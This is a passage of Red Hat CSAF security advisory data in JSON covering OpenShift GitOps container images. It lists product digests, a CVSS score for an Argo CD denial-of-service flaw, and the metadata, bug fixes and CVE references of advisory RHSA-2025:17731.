"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:a5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:d9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:b0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:cc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:d84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:dafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:df33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:cc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:eb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:a27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:b756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:bd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:e2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:a424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:d2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:a5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:d9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:b0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:cc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:d84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:dafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:df33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:cc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:eb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:a27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:b756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:bd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:e2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:a424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "github.com/argoproj/argo-cd: Argo CD unauthenticated Remote Denial of Service"
}
]
}
RHSA-2025:17731
Vulnerability from csaf_redhat - Published: 2025-10-09 18:48 - Updated: 2025-12-04 17:10Summary
Red Hat Security Advisory: Red Hat OpenShift GitOps v1.17.2 security update
Notes
Topic
Important: Red Hat OpenShift GitOps v1.17.2 security update
Details
An update is now available for Red Hat OpenShift GitOps.
Bug Fix(es) and Enhancement(s):
* GITOPS-7180: Redis HA Proxy pod fails to start with Security Context error
* GITOPS-7331: operator controller logs error when console link is disabled
* GITOPS-7461: Redis container fails with "runAsNonRoot and image will run as root" after upgrade to argocd-operator 0.14.1
* GITOPS-7564: OpenShift GitOps v1.17 must-gather images produce an empty must-gather
* GITOPS-7606: ApplicationSet: Bitbucket SCM/PR generator leaks HTTP connections
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Important: Red Hat OpenShift GitOps v1.17.2 security update",
"title": "Topic"
},
{
"category": "general",
"text": "An update is now available for Red Hat OpenShift GitOps.\nBug Fix(es) and Enhancement(s):\n* GITOPS-7180: Redis HA Proxy pod fails to start with Security Context error\n* GITOPS-7331: operator controller logs error when console link is disabled\n* GITOPS-7461: Redis container fails with \"runAsNonRoot and image will run as root\" after upgrade to argocd-operator 0.14.1\n* GITOPS-7564: OpenShift GitOps v1.17 must-gather images produce an empty must-gather\n* GITOPS-7606: ApplicationSet: Bitbucket SCM/PR generator leaks HTTP connections",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2025:17731",
"url": "https://access.redhat.com/errata/RHSA-2025:17731"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-22874",
"url": "https://access.redhat.com/security/cve/CVE-2025-22874"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-47907",
"url": "https://access.redhat.com/security/cve/CVE-2025-47907"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-59531",
"url": "https://access.redhat.com/security/cve/CVE-2025-59531"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-59537",
"url": "https://access.redhat.com/security/cve/CVE-2025-59537"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-59538",
"url": "https://access.redhat.com/security/cve/CVE-2025-59538"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-55191",
"url": "https://access.redhat.com/security/cve/CVE-2025-55191"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_openshift_gitops/1.17/",
"url": "https://docs.redhat.com/en/documentation/red_hat_openshift_gitops/1.17/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2025/rhsa-2025_17731.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift GitOps v1.17.2 security update",
"tracking": {
"current_release_date": "2025-12-04T17:10:25+00:00",
"generator": {
"date": "2025-12-04T17:10:25+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.13"
}
},
"id": "RHSA-2025:17731",
"initial_release_date": "2025-10-09T18:48:05+00:00",
"revision_history": [
{
"date": "2025-10-09T18:48:05+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2025-10-23T03:58:18+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-12-04T17:10:25+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift GitOps 1.17",
"product": {
"name": "Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_gitops:1.17::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift GitOps"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256%3Ac28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256%3Aa2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-agent-rhel8@sha256%3Aa73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-extensions-rhel8@sha256%3Afaa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel9@sha256%3A54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256%3Aaf6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256%3Aba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256%3Ad3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256%3Acbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-operator-bundle@sha256%3A4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256%3Ac9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
